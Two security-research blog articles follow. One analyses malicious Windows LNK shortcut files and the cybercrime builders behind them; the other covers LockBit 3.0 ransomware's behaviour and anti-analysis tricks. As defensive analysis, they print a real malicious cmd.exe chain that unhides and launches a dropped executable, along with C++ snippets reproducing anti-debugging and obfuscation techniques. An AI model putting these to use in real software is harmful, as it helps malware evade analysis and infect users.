
Who Needs Macros? | Threat Actors Pivot to Abusing Explorer and Other LOLBins via Windows Shortcuts 

By Aleksandar Milenkoski & Jim Walter

Executive Summary

  • Windows Explorer (explorer.exe) is the top initial living-off-the-land binary (LOLbin) in the chain of LOLbins that threat actors abuse to execute malware through malicious Windows shortcuts (LNK files).
  • Our mass analysis of 27510 representative malicious LNK files from VirusTotal revealed Windows Explorer at the top of the list (with 87.2% prevalence), followed by powershell.exe (7.3%), wscript.exe (4.4%), and rundll32.exe (0.5%). LNK files are currently immensely popular among threat actors for malware deployment and persistence.
  • Since May 2022, we have observed intensive advertising in the cybercrime web space of new versions of the mLNK and QuantumBuilder tools for building malicious LNK files, which offer many new features for evasion and stealth.
  • The mLNK and QuantumBuilder tools enable threat actors to build malicious LNK files in a configurable and convenient manner. Given the popularity of LNK files among threat actors, there is an increasing demand for such tools on the cybercrime market.
  • The actors behind the QuantumBuilder tool for building malicious LNK files advertise the tool and the value of LNK files to threat actors by claiming that Office macros “are for the most part dead” [as a medium for deploying malware], referring to Microsoft’s recent decision to disable by default Office macro execution in the context of documents that originate from untrusted sources.

Overview

This article discusses Windows shortcuts (LNK files) as a medium to deploy malware and/or establish persistence. In the initial stages of an attack, threat actors are gravitating more towards the use of malicious shortcuts that deploy malware by executing code in the context of so-called living-off-the-land binaries (LOLbins) – legitimate executables that are readily available on Windows systems, such as powershell.exe or mshta.exe – to bypass detection. Threat actors conveniently build malicious LNK files with Windows system capabilities or tools specifically designed for that purpose, and then distribute the files to victims, usually through phishing emails.

Because of these advantages, threat actors are widely abusing shortcuts. Since Microsoft’s announcement that Office applications will by default disable the execution of Office macros in the context of documents that originate from untrusted sources, there has been a significant uptick in malicious actors using alternative mediums for deploying malware, such as malicious Windows Apps and shortcuts (LNK files). We covered malicious Windows Apps in a previous article. In this article, we focus on malicious shortcuts and provide:

  • Insights about execution chains that originate from malicious shortcuts. We base our insights on an analysis of 27510 malicious LNK file samples from VirusTotal that are representative of the current malicious shortcut landscape.
  • An overview of active widespread attack campaigns that involve malicious shortcuts and of the dynamics of the cybercrime market for tools that build malicious LNK files.
  • A summarizing overview of the system activities that take place when a user executes a malicious shortcut. This enables a better, more general understanding of what occurs on a system when a user falls prey to an attack that involves a malicious LNK file.

Current Developments in the Malicious Shortcut Threat Scene

Given the popularity of LNK files among threat actors, the cybercrime tool market has quickly adjusted to serve the demand for tools that build malicious LNK files in a configurable and convenient manner. In this section, we spotlight the mLNK and QuantumBuilder tools for building malicious LNK files. We observed that these tools have recently received updates and are currently being intensively advertised in the cybercrime web space.

mLNK

The mLNK tool – released by NativeOne, a tool vendor on the cybercrime scene – is known for its configurability and ease of use. NativeOne released the newest version of the tool, version 4.2, in June 2022. We observed an intensive advertising campaign for the new mLNK version on cybercrime forums and marketplaces.

The NativeOne ‘exploit website’

The new mLNK version brings new features that enable building LNK files that can evade Windows detection mechanisms, such as Microsoft Defender SmartScreen. The public release of mLNK currently sells for a basic price of $100 per month. NativeOne also sells a private release of mLNK 4.2 for $125, which bundles more evasion mechanisms than the $25-cheaper public release of the tool.

Purchase page of mLNK
Advertising page of mLNK 4.2 features

QuantumBuilder

Similar to mLNK, the QuantumBuilder tool is configurable and easy to use, enabling threat actors to conveniently create malicious LNK files. In May 2022, we started observing an advertising campaign for a new QuantumBuilder version in the cybercrime web space, consistent with other reports.

The QuantumBuilder’s window for building a malicious shortcut

The actors behind the QuantumBuilder tool distinguish between public, VIP, and private users, and sell the tool for a basic price of €189. The following figure depicts the price list of QuantumBuilder as advertised online, including the advantages of becoming a VIP or private QuantumBuilder user.

The price list of QuantumBuilder

It is interesting to note that the actors behind QuantumBuilder advertise the tool by claiming that Office macros as a medium for deploying malware “are for the most part dead”, referring to Microsoft’s decision to disable by default Office macro execution in the context of documents that originate from untrusted sources.

Advertisement of QuantumBuilder

Active Attack Campaigns Leveraging Shortcuts

A number of widespread attack campaigns that involve malicious shortcuts are active at the time of writing this article:

  • Threat actors have been intensively distributing the major malware families QBot, Emotet, IcedID, and Bumblebee through LNK files since the second quarter of 2022. These malware families are capable of deploying additional malware on compromised systems, including destructive ransomware. In addition, the Threat Analysis Group (TAG) at Google has observed Exotic Lily, an initial access broker (IAB) for ransomware actors, distributing malicious LNK files to infect systems.
  • Threat actors have been massively deploying the Raspberry Robin worm through malicious LNK files since September 2021. These attacks specifically involve infected USB media containing the malicious LNK files.
  • There are several Ukraine-themed attack campaigns, as well as attack campaigns specifically targeting Ukrainian systems, that have been active since the second quarter of 2022. The Armageddon threat group, which the Security Service of Ukraine identifies as a unit of the Federal Security Service of the Russian Federation, has been distributing malicious LNK files through targeted phishing emails. The malicious LNK files deploy the GammaLoad.PS1_v2 malware on compromised systems. There are also other Ukraine-themed malicious LNK files currently in circulation. In addition, the GlowSand attack campaign includes malicious LNK files that download payloads from attacker-controlled endpoints that respond only to requests from systems with Ukrainian IP addresses.

How Threat Actors Are Abusing Shortcuts

In this section, we characterize malicious shortcuts by analyzing the filesystem path to the shortcut target and the command line arguments that the system specifies at shortcut target activation. We take a snapshot of the current malicious shortcut landscape, using VirusTotal as a mass repository of representative malicious LNK file samples. We analyzed 27510 LNK file samples submitted to VirusTotal between July 14th, 2021 and July 14th, 2022. All samples were considered malicious by at least 30 vendors. 68.89% of the LNK file samples were submitted in 2022, and the remaining 31.11% in 2021.

We provide current insights about execution chains that originate from malicious shortcuts to assist threat detection and hunting efforts. The section How Does Windows Execute Shortcuts? below provides background information on Windows shortcuts and the system activities that take place when a user executes a shortcut.

The following image depicts the targets of the malicious shortcuts we analyzed – the executables that the shortcuts execute at target activation – and their prevalence in the set of malicious shortcuts (expressed in percentages, rounded to three decimal places).

Targets of malicious shortcuts

The shortcut targets are LOLbins and/or enable the execution of attacker-specified code and/or executables. We observed the following targets at the top of the list:

  • cmd.exe, the Windows command interpreter, which enables the execution of Windows commands and arbitrary executables.
  • rundll32.exe, which enables the execution of arbitrary code in a Windows DLL.
  • wscript.exe, a Windows script execution environment, which enables the execution of arbitrary script code.
  • powershell.exe, the command interpreter of the PowerShell scripting engine.

Malicious shortcuts activate cmd.exe as the shortcut target to execute one or multiple Windows commands (typically implemented as executables that reside in the %SystemRoot%\System32 folder), and/or attacker-provided files:

  • Files with the filename extension .exe (.exe files) and of Windows executable file format.
  • Files with filename extensions different from .exe (non-.exe files) and of any file format, including the Windows executable format.

Malicious shortcuts execute multiple Windows commands and/or attacker-provided files through cmd.exe by specifying them as part of command statements that are chained with the & symbol. The chained command statements are part of the command line arguments of the shortcut target cmd.exe.

The malicious shortcuts we analyzed execute a variety of Windows commands through cmd.exe.

The Windows commands executed through cmd.exe and their prevalence

We categorize the commands as follows:

  • Commands for command execution flow control, such as exit, goto, and for.
  • Commands for file manipulation, such as xcopy, attrib, and copy.
  • Commands that enable the execution of attacker-specified code and/or executables – LOLbins, such as explorer, powershell, wscript, rundll32, msiexec, start, and regsvr32.

    The prevalence of LOLbins in the set of the malicious shortcuts we analyzed

  • Commands for information gathering, reconnaissance, and system configuration, such as findstr, set, ping, and net.
  • Commands for messaging and controlling the command interpreter output, such as cls, msg, echo, and rem.

The majority of the filenames of the attacker-provided .exe files that the malicious shortcuts we analyzed execute through cmd.exe are random – 99.914% of the filenames are random and only 0.086% are non-random (comprehensible), such as streamer.exe, setup.exe, or windowsupdater.exe.

We grouped the malicious shortcuts that execute attacker-provided .exe files through cmd.exe into clusters according to the filenames of the .exe files. We observed that the .exe files with non-random filenames are executed by a small number of shortcut clusters with large population sizes, averaging 1177 shortcuts per cluster. In contrast, the .exe files with random filenames are executed by a large number of shortcut clusters with very small population sizes, the majority of which contain no more than 3 shortcuts. This shows that defenders should treat as highly suspicious any shortcuts that execute .exe files with random filenames, while staying on top of .exe file naming trends in the threat landscape for better detection coverage.

Number of malicious shortcut clusters vs. shortcut cluster population sizes

We observed a very diverse set of 253 different filename extensions of the attacker-provided non-.exe files that the malicious shortcuts we analyzed execute through cmd.exe.

The top 40 filename extensions of the attacker-provided non-.exe files the malicious shortcuts we analyzed execute through cmd.exe and the extensions’ prevalence

Considering filename extensions only, the malicious shortcuts executed:

  • Script files, such as files with the filename extensions .vbs, .vbe, and .js;
  • Executable files, such as files with the filename extensions .scr and .dll;
  • Data files – files that store textual, audio, video, archive, and/or other arbitrary content, such as files with the filename extensions .docx, .png, .log, and .dat.

We observed that the vast majority of the apparent data files, such as .docx or .avi files, are in fact executable or script files, such as .exe or .vbs files, using spoofed filename extensions to masquerade as files of other formats.

For approximately 0.5% of the malicious shortcuts we analyzed, the combined length of the filesystem path to the shortcut target and the command line arguments that the system specifies at target activation is greater than 260 characters. Visual inspection of the Properties > Shortcut > Target field of an LNK file in the Explorer utility, which displays the path to the shortcut target and any command line arguments, does not reveal anything beyond 260 characters. Attackers are known to abuse this for obfuscation – they craft LNK files such that command line arguments are padded with characters, such as newline or space, so that the combined length of the path to the shortcut target and the command line arguments significantly exceeds 260 characters.

We observed character padding mostly in shortcuts that targeted powershell.exe. In addition, we observed string concatenation and the use of the caret (^) symbol for target and/or command line argument obfuscation in approximately 2.5% of the samples.
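To make the two observations above easier to act on, the following C++ sketch dumps the full target path and argument string of an LNK file through the IShellLinkW and IPersistFile interfaces, using a buffer far larger than the 260 characters that the Properties dialog displays; padding characters and caret symbols then become visible in the output. The buffer sizes and output format are our own choices for illustration and are not taken from any specific tool.

#include <windows.h>
#include <shobjidl.h>
#include <shlguid.h>
#include <cstdio>
#pragma comment(lib, "ole32.lib")

// Dump the full target and arguments of an LNK file, revealing content that the
// Properties > Shortcut > Target field truncates at 260 characters.
void DumpShortcut(const wchar_t* lnkPath)
{
    CoInitialize(nullptr);
    IShellLinkW* link = nullptr;
    if (SUCCEEDED(CoCreateInstance(CLSID_ShellLink, nullptr, CLSCTX_INPROC_SERVER,
                                   IID_IShellLinkW, (void**)&link)))
    {
        IPersistFile* file = nullptr;
        if (SUCCEEDED(link->QueryInterface(IID_IPersistFile, (void**)&file)))
        {
            if (SUCCEEDED(file->Load(lnkPath, STGM_READ)))
            {
                wchar_t target[MAX_PATH] = {};
                wchar_t args[8192] = {};   // deliberately far larger than 260 characters
                link->GetPath(target, MAX_PATH, nullptr, SLGP_RAWPATH);
                link->GetArguments(args, 8192);
                wprintf(L"Target: %s\nArgument length: %zu\nArguments: %s\n",
                        target, wcslen(args), args);
            }
            file->Release();
        }
        link->Release();
    }
    CoUninitialize();
}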

How Does Windows Execute Shortcuts?

The user interface of the Windows operating system, a component referred to as the Windows Shell, manages the entities that users interact with and conceptually represents them as objects. Objects include entities that reside on the filesystem, such as files and folders, as well as other entities, such as networked computers. The Windows Shell structures these objects into a namespace – the Shell namespace.

When a user creates a shortcut to another object (also referred to as the shortcut target) using the Create shortcut command, the Windows Shell creates a Shell Link object and an LNK file – a file with the .lnk filename extension. An LNK file is in the binary Shell Link file format and stores information that Windows needs to access (activate) the shortcut target in data structures. This information includes:

  • The filesystem path to the shortcut target, for example, the path relative to the location of the LNK file (in the RELATIVE_PATH structure) and the absolute path (in the LinkTargetIDList structure).
  • The parameters (command line arguments) that the system specifies at shortcut target activation (in the COMMAND_LINE_ARGUMENTS structure).
  • The filesystem path to the shortcut icon that the system displays for the LNK file in icon view (in the ICON_LOCATION structure).
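For reference, the sketch below transcribes the fixed-size ShellLinkHeader that opens every LNK file in the [MS-SHLLINK] Shell Link format, together with a few LinkFlags bits that signal which of the structures listed above are present. The layout and values follow the public specification; the C++ field and constant names are ours.

#include <cstdint>

// The fixed-size ShellLinkHeader at the start of every LNK file.
#pragma pack(push, 1)
struct ShellLinkHeader {
    uint32_t HeaderSize;      // always 0x0000004C
    uint8_t  LinkCLSID[16];   // 00021401-0000-0000-C000-000000000046
    uint32_t LinkFlags;       // which optional structures follow the header
    uint32_t FileAttributes;
    uint64_t CreationTime;
    uint64_t AccessTime;
    uint64_t WriteTime;
    uint32_t FileSize;
    int32_t  IconIndex;
    uint32_t ShowCommand;
    uint16_t HotKey;
    uint16_t Reserved1;
    uint32_t Reserved2;
    uint32_t Reserved3;
};
#pragma pack(pop)

// LinkFlags bits that signal the presence of the structures discussed above.
constexpr uint32_t HasLinkTargetIDList = 0x00000001;  // absolute target path (ID list)
constexpr uint32_t HasRelativePath     = 0x00000008;  // RELATIVE_PATH structure
constexpr uint32_t HasArguments        = 0x00000020;  // COMMAND_LINE_ARGUMENTS structure
constexpr uint32_t HasIconLocation     = 0x00000040;  // ICON_LOCATION structure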

The figure below depicts the content of the malicious LNK file that we named malLNK.lnk (SHA-1 hash value: 5b241d50f1a662d69c96d824d7567d4503379c37). We displayed the content of malLNK.lnk using the LECmd LNK file parsing tool.

The content of malLNK.lnk (trimmed for brevity; the ? replaces Unicode characters)

The shortcut target of malLNK.lnk is C:\Windows\System32\cmd.exe and the command line argument is:

/c "%SystemRoot%\explorer.exe %cd%新建文件夹 & attrib -s -h %cd%qCAQlUf.exe & xcopy /F /S /Q /H /R /Y %cd%qCAQlUf.exe %temp%\rplKl\ & attrib +s +h %cd%qCAQlUf.exe & start %temp%\rplKl\qCAQlUf.exe & exit"

In summary, the activated shortcut target uses the Explorer utility to execute an executable, manipulates the System and Hidden attributes of executables, copies an executable, and executes the copied executable.

The following figure depicts a simplified overview of the activities that the Windows operating system conducts to activate a shortcut target through an LNK file. We take malLNK.lnk as a running example.

Overview of system activities at shortcut target activation. The numbers label the transitions between the activities.

Windows handles shortcut target activation using implementations of the IContextMenu::InvokeCommand Windows Shell method. This method takes a single parameter: a pointer to a CMINVOKECOMMANDINFO or CMINVOKECOMMANDINFOEX structure. The CMINVOKECOMMANDINFO(EX) data structure stores information about the command that the Windows Shell executes when a user triggers the execution of IContextMenu::InvokeCommand. In the context of shortcuts, the command is the shortcut target with any command line arguments.

The information that CMINVOKECOMMANDINFO(EX) stores includes the working directory at command execution (the lpDirectory(W) structure fields) and command parameters (the lpParameters(W) structure fields). In contrast to CMINVOKECOMMANDINFO, CMINVOKECOMMANDINFOEX allows for Unicode structure field values.
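The short C++ fragment below sketches what these fields look like once populated for malLNK.lnk; the Shell performs this population internally, and the paths shown (with user as a placeholder account name) are illustrative.

#include <windows.h>
#include <shlobj.h>

// Illustrative population of the CMINVOKECOMMANDINFOEX fields discussed above.
CMINVOKECOMMANDINFOEX BuildInvokeInfo()
{
    CMINVOKECOMMANDINFOEX info = {};
    info.cbSize       = sizeof(CMINVOKECOMMANDINFOEX);       // mandatory size field
    info.fMask        = CMIC_MASK_UNICODE;                   // the W (Unicode) fields are valid
    info.nShow        = SW_SHOWNORMAL;
    info.lpDirectory  = "C:\\Users\\user\\Desktop\\malLNK";  // working directory (ANSI)
    info.lpDirectoryW = L"C:\\Users\\user\\Desktop\\malLNK"; // working directory (Unicode)
    // lpParameters(W) is empty at this point; CShellLink::InvokeCommand later fills it
    // from the COMMAND_LINE_ARGUMENTS structure stored inside the LNK file.
    return info;
}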

When a user double-clicks malLNK.lnk (label [1]), the system executes the CDefFolderMenu::InvokeCommand function (label [2]). CDefFolderMenu::InvokeCommand is implemented in %SystemRoot%\System32\shell32.dll. This function populates a CMINVOKECOMMANDINFOEX structure and passes the execution flow to the CShellLink::InvokeCommand function with the populated CMINVOKECOMMANDINFOEX structure as the function’s parameter.

CShellLink::InvokeCommand is implemented in %SystemRoot%\System32\windows.storage.dll (label [3]). The CMINVOKECOMMANDINFOEX data structure that the CShellLink::InvokeCommand function takes as its parameter has only a few fields populated, for example, the mandatory cbSize field (which specifies the size of CMINVOKECOMMANDINFOEX in bytes) and lpDirectory(W).

The figure below depicts the content of the CMINVOKECOMMANDINFOEX structure that CShellLink::InvokeCommand takes as its parameter. malLNK.lnk resides in the C:\Users\<user>\Desktop\malLNK folder – this determines the values of the lpDirectory(W) fields.

The content of the CMINVOKECOMMANDINFOEX structure before the CShellLink::InvokeCommand function executes

The CShellLink::InvokeCommand function conducts the central activities related to shortcut handling. This includes locating the shortcut target on the filesystem, expanding environment variables, and fully populating a CMINVOKECOMMANDINFOEX structure (label [4]). CShellLink::InvokeCommand passes the execution flow back to the CDefFolderMenu::InvokeCommand function with a fully populated CMINVOKECOMMANDINFOEX structure (label [5]). For example, the populated CMINVOKECOMMANDINFOEX structure stores the command parameter in the lpParameters(W) structure fields – this is the data in the COMMAND_LINE_ARGUMENTS structure that resides in malLNK.lnk.

The content of the CMINVOKECOMMANDINFOEX structure after the CShellLink::InvokeCommand function executes

The CDefFolderMenu::InvokeCommand function then passes the execution flow to the CRegistryVerbsContextMenu::InvokeCommand function with the fully populated CMINVOKECOMMANDINFOEX structure as the function’s parameter (label [6]). CRegistryVerbsContextMenu::InvokeCommand is implemented in the shell32.dll DLL.

The invocation of CRegistryVerbsContextMenu::InvokeCommand leads to the creation of a new process by invoking the CreateProcessW function that is implemented in %SystemRoot%\System32\kernel32.dll (label [7]). The command line of this process is the shortcut target and the command line argument, as shown below.

C:\windows\system32\cmd.exe /c "%SystemRoot%\explorer.exe %cd%新建文件夹 & attrib -s -h %cd%qCAQlUf.exe & xcopy /F /S /Q /H /R /Y %cd%qCAQlUf.exe %temp%\rplKl\ & attrib +s +h %cd%qCAQlUf.exe & start %temp%\rplKl\qCAQlUf.exe & exit"
The command line of the newly created process at shortcut target activation
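A minimal sketch of that CreateProcessW call, assuming the command line and working directory from the example above, could look as follows; the Shell’s internal call site of course differs, and the command line is abbreviated here.

#include <windows.h>

// Launch the shortcut target the way label [7] describes: one command line that
// combines the target executable and its arguments.
void LaunchShortcutTarget()
{
    // CreateProcessW may modify the command-line buffer, so it must be writable.
    wchar_t cmdLine[] =
        L"C:\\windows\\system32\\cmd.exe /c \"%SystemRoot%\\explorer.exe ... & exit\"";
    STARTUPINFOW si = { sizeof(si) };
    PROCESS_INFORMATION pi = {};

    if (CreateProcessW(nullptr, cmdLine, nullptr, nullptr, FALSE, 0, nullptr,
                       L"C:\\Users\\user\\Desktop\\malLNK",   // working directory
                       &si, &pi))
    {
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
}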

Recommendations for Investigators and Users

Investigators should consider highly suspicious any Windows shortcut (LNK file) that exhibits the following in the execution chain that originates from the shortcut:

  • Execution of executables (including activation of shortcut targets) that are LOLbins and/or enable the execution of attacker-specified code and/or executables. We observed the following such executables to be among the most prevalent in the set of malicious shortcuts we analyzed: explorer.exe, powershell.exe, and wscript.exe.
  • Execution of files with a filename extension different from .exe (non-.exe files) through cmd.exe as the shortcut target. We observed 253 different extensions of the non-.exe files that the malicious shortcuts we analyzed execute. The majority of these non-.exe files are files that store executable code (for example, Windows executables or script files) masquerading as files of other formats, such as audio or video files.
  • Execution of files with the .exe extension and random filenames through cmd.exe as the shortcut target. For .exe files with non-random (comprehensible) filenames, investigators should stay on top of .exe file naming trends in the threat landscape for better detection coverage.

Users should stay vigilant against phishing attacks and refrain from executing attached files that originate from unknown sources. Threat actors are distributing malicious LNK files through phishing emails at a mass scale and there is a substantial number of active widespread attack campaigns that involve malicious shortcuts. The malicious LNK files often come with misleading filenames and icons masquerading as important documents or critical software to lure users into activating the shortcuts.

LockBit 3.0 Update | Unpicking the Ransomware’s Latest Anti-Analysis and Evasion Techniques

By Jim Walter & Aleksandar Milenkoski

LockBit 3.0 ransomware (aka LockBit Black) is an evolution of the prolific LockBit ransomware-as-a-service (RaaS) family, which has roots that extend back to BlackMatter and related entities. After critical bugs were discovered in LockBit 2.0 in March 2022, the authors began work on updating their encryption routines and adding several new features designed to thwart researchers. In June 2022, LockBit 3 caught the interest of the media as the ransomware operators announced they were offering a ‘bug bounty’ to researchers. In this post, we provide an overview of the LockBit 3.0 ransomware update and offer a technical dive for researchers into LockBit 3.0’s anti-analysis and evasion features.

LockBit 3.0 Changes and New Features Since LockBit 2.0

Around June of 2022, operators and affiliates behind LockBit ransomware began the shift to LockBit 3.0. Adoption of LockBit 3.0 by affiliates has been rapid, and numerous victims have been identified on the new “Version 3.0” leak sites, a collection of public blogs naming non-compliant victims and leaking extracted data.

LockBit 3 ransomware leaks site

In order to improve resilience, the operators have been aggressive about standing up multiple mirrors for their leaked data and publicizing the site URLs.

LockBit has also added an instant search tool to their leaks site.

Updated LockBit leak site with new Search feature

The authors of LockBit 3.0 have introduced new management features for affiliates and added Zcash for victim payments in addition to Monero and Bitcoin.

The ransomware authors also claim to have opened a public “bug bounty” program. Ostensibly, this is an effort to improve the quality of the malware and to financially reward those who assist.

Lockbit ransomware group announced today Lockbit 3.0 is officially released with the message: "Make Ransomware Great Again!"

Additionally, Lockbit has launched their own Bug Bounty program paying for PII on high-profile individuals, web security exploits, and more… pic.twitter.com/ByNFdWe4Ys

— vx-underground (@vxunderground) June 26, 2022

On top of that, there is a purported $1 million reward on offer to anyone who can uncover the identity of the program affiliate manager. Given the criminal nature of the operators, however, would-be researchers may find that reporting bugs to a crimeware outfit does not lead to the promised payout but could instead lead to criminal charges from law enforcement.

LockBit 3.0 Payloads and Encryption

The updated LockBit payloads retain all the prior functionality of LockBit 2.0.

Initial delivery of the LockBit ransomware payloads is typically handled via third-party frameworks such as Cobalt Strike. As with LockBit 2.0, we have seen infections occur down the chain from other malware components as well, such as a SocGholish infection dropping Cobalt Strike, which in turn delivers the LockBit 3 ransomware.

The payloads themselves are standard Windows PE files with strong similarities to prior generations of LockBit as well as BlackMatter ransomware families.

PEStudio view of LockBit 3.0 Payload

LockBit ransomware payloads are designed to execute with administrative privileges. In the event that the malware does not have the necessary privileges, a UAC bypass (via CMSTP) will be attempted.

LockBit 3.0 achieves persistence via installation of System Services. Each execution of the payload will install multiple services. We have observed the following service names in conjunction with LockBit 3.0 ransomware payloads.

SecurityHealthService
Sense
sppsvc
WdBoot
WdFilter
WdNisDrv
WdNisSvc
WinDefend
wscsvc
vmicvss
vmvss
VSS
EventLog

As with previous versions, LockBit 3.0 will attempt to identify and terminate specific services if found. The following service names are targeted for termination in analyzed LockBit 3.0 samples:

backup
GxBlr
GxCIMgr
GxCVD
GxFWD
GxVss
memtas
mepocs
msexchange
sophos
sql
svc$
veeam
vss

In addition, the following processes are targeted for termination:

agntsvc
dbeng50
dbsnmp
encsvc
excel
firefox
infopath
isqlplussvc
msaccess
mspub
mydesktopqos
mydesktopservice
notepad
ocautoupds
ocomm
ocssd
onenote
oracle
outlook
powerpnt
registry
sqbcoreservice
steam
synctime
tbirdconfig
thebat
thunderbird
visio
winword
wordpad
xfssvccon

LockBit 3.0 writes a copy of itself to the %programdata% directory and subsequently launches from that location.

The encryption phase is extremely rapid, even when spreading to adjacent hosts. The ransomware payloads were able to fully encrypt our test host in well under a minute.

On execution, the LockBit 3.0 ransomware will drop newly-formatted ransom notes along with a change to the desktop background. Interestingly, notepad and wordpad are included in the list of processes targeted for termination as noted above. Therefore, if a victim attempts to open the ransom note immediately after it is dropped, it will promptly close, since the process is blocked until the ransomware completes its execution.

The new LockBit 3.0 ransomware desktop wallpaper is a simple text message on a black background.

LockBit 3.0 Desktop Wallpaper

The extension appended to newly encrypted files differs per campaign or sample. For example, we have seen “HLJkNskOq” and “futRjC7nx”. Encrypted files receive the campaign-specific string as their new extension, and the ransom note filenames are prefixed with the same string.

futRjC7nx.README
HLJkNskOq.README

During our analysis, we observed infected machines shutting down ungracefully approximately 10 minutes after the ransomware payload was launched. This behavior may vary per sample, but it is worth noting.

Post-infection, LockBit 3.0 victims are instructed to make contact with their attacker via their TOR-based “support” portal.

LockBit 3.0 Ransom Note Excerpt

LockBit 3 Anti-Analysis & Evasion

The LockBit 3.0 ransomware uses a variety of anti-analysis techniques to hinder static and dynamic analysis, and exhibits similarities to the BlackMatter ransomware in this regard. These techniques include code packing, obfuscation and dynamic resolution of function addresses, function trampolines, and anti-debugging techniques. In this section, we cover some of the anti-analysis techniques that LockBit 3.0 uses.

LockBit 3.0 payloads require a specific passphrase to execute. The passphrase is unique to each sample or campaign and serves to hinder dynamic and sandbox analysis if the passphrase has not been recovered along with the sample. A similar technique has been used by Egregor and BlackCat ransomware. The passphrase is provided upon execution via the -pass parameter. For example,

lockbit.exe -pass XX66023ab2zyxb9957fb01de50cdfb6

Encrypted content located in the LockBit 3.0 payload is decrypted at runtime using an XOR mask. The images below show the content of the ransomware’s .text executable segment before (label 1) and after (label 2) the ransomware has decrypted the segment content. The .text segment starts at the virtual address 0x401000.


The content of the ransomware’s .text executable segment
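As a rough sketch of this kind of in-place unmasking, the C++ fragment below XOR-decodes a mapped executable segment before it runs; the constant single-byte mask and the straight loop are assumptions for illustration and do not reflect LockBit 3.0’s actual key material or decryption routine.

#include <windows.h>

// In-place XOR unmasking of an executable segment (illustrative mask handling).
void UnmaskSegment(BYTE* segment, SIZE_T size, BYTE mask)
{
    DWORD oldProtect = 0;
    // The mapped .text segment is normally not writable, so lift the protection first.
    if (!VirtualProtect(segment, size, PAGE_EXECUTE_READWRITE, &oldProtect))
        return;
    for (SIZE_T i = 0; i < size; ++i)
        segment[i] ^= mask;
    VirtualProtect(segment, size, oldProtect, &oldProtect);
}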

LockBit 3.0 also stores function trampolines in heap memory and executes functions through them, for example, the Windows system calls NtSetInformationThread and ZwProtectVirtualMemory. The ransomware obfuscates the function addresses that the trampolines execute using XOR and/or bit-rotation obfuscation.

Some of the function trampolines LockBit 3.0 implements
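The fragment below sketches the decode-and-call pattern of such a trampoline on 64-bit Windows, assuming an XOR mask combined with a rotate-right; the constants, rotation count, and operation order are illustrative rather than values recovered from LockBit 3.0 samples.

#include <windows.h>
#include <intrin.h>

// Decode-and-call pattern of an obfuscated trampoline (illustrative constants).
using NtSetInformationThread_t = LONG(NTAPI*)(HANDLE, ULONG, PVOID, ULONG);

ULONG_PTR g_obfuscatedAddress;                          // written into heap memory by the loader stub
constexpr ULONG_PTR kXorMask = 0x1122334455667788ULL;   // illustrative mask

LONG CallThroughTrampoline(HANDLE thread, ULONG infoClass)
{
    // Reverse the obfuscation: rotate right, then XOR off the mask.
    ULONG_PTR decoded = _rotr64(g_obfuscatedAddress, 13) ^ kXorMask;
    auto fn = reinterpret_cast<NtSetInformationThread_t>(decoded);
    return fn(thread, infoClass, nullptr, 0);
}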

Several techniques are implemented for detecting the presence of a debugger and hindering dynamic analysis. For example, the ransomware evaluates whether heap memory parameters that indicate the presence of a debugger are set. Such flags are HEAP_TAIL_CHECKING_ENABLED (0x20) and HEAP_VALIDATE_PARAMETERS_ENABLED (0x40000000).

LockBit 3.0 examines the ForceFlags value of its default process heap, reached through the PEB (Process Environment Block), to evaluate whether HEAP_VALIDATE_PARAMETERS_ENABLED is set.

LockBit 3.0 evaluates whether HEAP_VALIDATE_PARAMETERS_ENABLED is set

The ransomware also evaluates whether the 0xABABABAB byte signature is present at the end of heap memory blocks that it has previously allocated. The presence of this byte signature means that HEAP_TAIL_CHECKING_ENABLED is set.

LockBit 3.0 evaluates whether HEAP_TAIL_CHECKING_ENABLED is set
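For reference, the C++ fragment below shows textbook versions of both heap-based checks; the PEB and heap offsets are undocumented and are shown for 64-bit Windows as commonly listed in anti-debugging references, so this is an illustration of the technique rather than a reconstruction of LockBit 3.0’s code.

#include <windows.h>
#include <intrin.h>

// ForceFlags check: undocumented offsets for 64-bit Windows.
bool HeapForceFlagsIndicateDebugger()
{
    BYTE* peb  = (BYTE*)__readgsqword(0x60);     // PEB of the current process
    BYTE* heap = *(BYTE**)(peb + 0x30);          // PEB->ProcessHeap
    DWORD forceFlags = *(DWORD*)(heap + 0x74);   // HEAP->ForceFlags
    return (forceFlags & 0x40000000) != 0;       // HEAP_VALIDATE_PARAMETERS_ENABLED
}

// Heap-tail check: 0xAB bytes follow allocations when tail checking is enabled.
bool HeapTailIndicatesDebugger()
{
    const SIZE_T size = 0x10;
    BYTE* block = (BYTE*)HeapAlloc(GetProcessHeap(), 0, size);
    if (!block)
        return false;
    // With HEAP_TAIL_CHECKING_ENABLED (0x20), the heap manager appends 0xAB bytes
    // directly after the user-requested block size.
    bool tagged = block[size] == 0xAB && block[size + 1] == 0xAB &&
                  block[size + 2] == 0xAB && block[size + 3] == 0xAB;
    HeapFree(GetProcessHeap(), 0, block);
    return tagged;
}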

The LockBit 3.0 ransomware executes the NtSetInformationThread function through a trampoline, such that the ThreadHandle and ThreadInformationClass function parameters have the values 0xFFFFFFFE and 0x11 (ThreadHideFromDebugger). This stops the flow of debug events from the ransomware’s current thread to an attached debugger, which effectively hides the thread from the debugger and hinders dynamic analysis.

LockBit 3.0 executes NtSetInformationThread
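Expressed as a direct call, the operation looks roughly like the sketch below; LockBit 3.0 reaches the same API through one of its obfuscated trampolines instead, and the only assumption here is that NtSetInformationThread is resolved from ntdll.dll at runtime.

#include <windows.h>

// ThreadHideFromDebugger via a direct call.
typedef LONG(NTAPI* NtSetInformationThread_t)(HANDLE, ULONG, PVOID, ULONG);

void HideCurrentThreadFromDebugger()
{
    const ULONG ThreadHideFromDebugger = 0x11;
    auto fn = (NtSetInformationThread_t)GetProcAddress(
        GetModuleHandleW(L"ntdll.dll"), "NtSetInformationThread");
    if (fn)
        // 0xFFFFFFFE (-2) is the pseudo-handle for the current thread.
        fn((HANDLE)(LONG_PTR)-2, ThreadHideFromDebugger, nullptr, 0);
}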

In addition, LockBit scrambles the implementation of the DbgUiRemoteBreakin function to prevent debuggers from attaching to the ransomware process. When it executes, LockBit 3.0 ransomware:

  • Resolves the address of DbgUiRemoteBreakin.
  • Executes the ZwProtectVirtualMemory function through a trampoline to apply the PAGE_EXECUTE_READWRITE (0x40) protection to the first 32 bytes of the memory region where the implementation of DbgUiRemoteBreakin resides. This makes the bytes writable.
  • Executes the SystemFunction040 (RtlEncryptMemory) function through a trampoline to encrypt the bytes that the ransomware has previously made writable. This scrambles the implementation of the DbgUiRemoteBreakin function and prevents debuggers from attaching to the ransomware process.
LockBit 3.0 modifies the implementation of the DbgUiRemoteBreakin function

